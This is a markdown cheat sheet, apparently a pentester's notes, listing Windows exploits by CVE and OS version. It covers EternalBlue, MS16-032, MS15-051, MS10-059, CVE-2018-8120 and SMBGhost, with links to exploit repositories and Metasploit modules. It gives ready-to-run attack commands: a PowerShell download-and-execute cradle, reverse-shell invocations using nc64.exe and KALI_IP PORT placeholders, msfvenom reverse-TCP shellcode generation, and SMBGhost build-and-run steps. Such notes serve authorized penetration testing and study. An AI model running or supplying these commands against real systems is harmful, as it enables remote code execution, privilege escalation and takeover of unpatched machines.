# Windows exploits

## MS08-067 Exploit

* <https://github.com/jivoi/pentest/blob/master/exploit_win/ms08-067.py>
* <https://github.com/jivoi/pentest/blob/master/exploit_win/ms08-067_w2k3_sp2.py>

## MS17-010 EternalBlue Exploit

* msf:
  * checker: `use auxiliary/scanner/smb/smb_ms17_010`
  * exploit: `use exploit/windows/smb/ms17_010_eternalblue`
* [eternalblue\_manual\_exploit](https://root4loot.com/post/eternalblue_manual_exploit/)
  * no pipes needed | manual method
* [helviojunior/MS17-010.git](https://github.com/helviojunior/MS17-010.git)
  * update the username in the script to guest / anonymous (if needed)
  * `python send_and_execute.py TARGET_IP SHELL.exe`
* [3ndG4me/AutoBlue-MS17-010](https://github.com/3ndG4me/AutoBlue-MS17-010)
  * make sure the prerequisites are installed first
  * `python zzz_exploit.py TARGET_IP`
* [exploit-db/42315](https://www.exploit-db.com/exploits/42315)

## MS16-032 Exploit

* [EmpireProject/Invoke-MS16032.ps1](https://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Invoke-MS16032.ps1)
  * `Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('shell.ps1')"`

## Windows 7

* MS11-046 | CVE-2011-1249 | win7 6.1.7600 N/A Build 7600 x86
  * [abatchy17/MS11-046](https://github.com/abatchy17/WindowsExploits/tree/master/MS11-046)
* MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86
  * [egre55/MS10-059:%20Chimichurri/Compiled](https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri/Compiled)
  * `MS10-059.exe KALI_IP PORT`

## MS09-050 'srv2.sys' SMB Code Execution (Python)

* [exploit-db/40280](https://www.exploit-db.com/exploits/40280)

## MS09-002 Memory Corruption IE7 Exploit

* msf: `use windows/browser/ms09_002_memory_corruption`

## Windows Server 2008 R2 SP1

* CVE-2018-8120
* Description: vulnerability where the Win32k component fails to properly handle objects in memory; allows running arbitrary code in kernel mode
* [SecWiki/CVE-2018-8120](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120)

## Windows 7 SP1

* CVE-2018-8120
  * Description: vulnerability where the Win32k component fails to properly handle objects in memory; allows running arbitrary code in kernel mode
  * [SecWiki/CVE-2018-8120](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120)

## Windows Server 2008 SP1

* CVE-2018-8120
  * Description: vulnerability where the Win32k component fails to properly handle objects in memory; allows running arbitrary code in kernel mode
  * [SecWiki/CVE-2018-8120](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120)
* MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86
  * [egre55/MS10-059:%20Chimichurri/Compiled](https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri/Compiled)
  * `MS10-059.exe KALI_IP PORT`

## Windows Server 2003

* MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86
  * [egre55/MS10-059:%20Chimichurri/Compiled](https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri/Compiled)
  * `MS10-059.exe KALI_IP PORT`

## Windows Server 2012 R2 Standard

* MS16-098 | CVE-2016-3309 | Server 2012 R2 Standard 6.3.9600 N/A Build 9600
  * [SecWiki/MS16-098](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-098)

## Windows Server 2008 R2

* MS15-051
  * [SecWiki/MS15-051/MS15-051-KB3045171.zip](https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip)
  * `ms15-051.exe "nc64.exe -c cmd.exe IP PORT"`
* MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86
  * [egre55/MS10-059:%20Chimichurri/Compiled](https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri/Compiled)
  * `MS10-059.exe KALI_IP PORT`

## Windows XP SP1

* Local privilege escalation using Windows services (upnphost and SSDPSRV)
  * <https://sohvaxus.github.io/content/winxp-sp1-privesc.html>

## CVE-2020-0796 | SMBGhost

**REQUIREMENTS:**

* needs SMB (port 445) open on the target

### Steps:

1. [danigargu/CVE-2020-0796](https://github.com/danigargu/CVE-2020-0796)
2. Generate shellcode using `msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f csharp`
3. Update the shellcode on line 204 of `exploit.cpp`
4. Set TARGET\_ARCH and configure the build for Release
5. Build solution
6. Run `cve-2020-0796-local.exe`
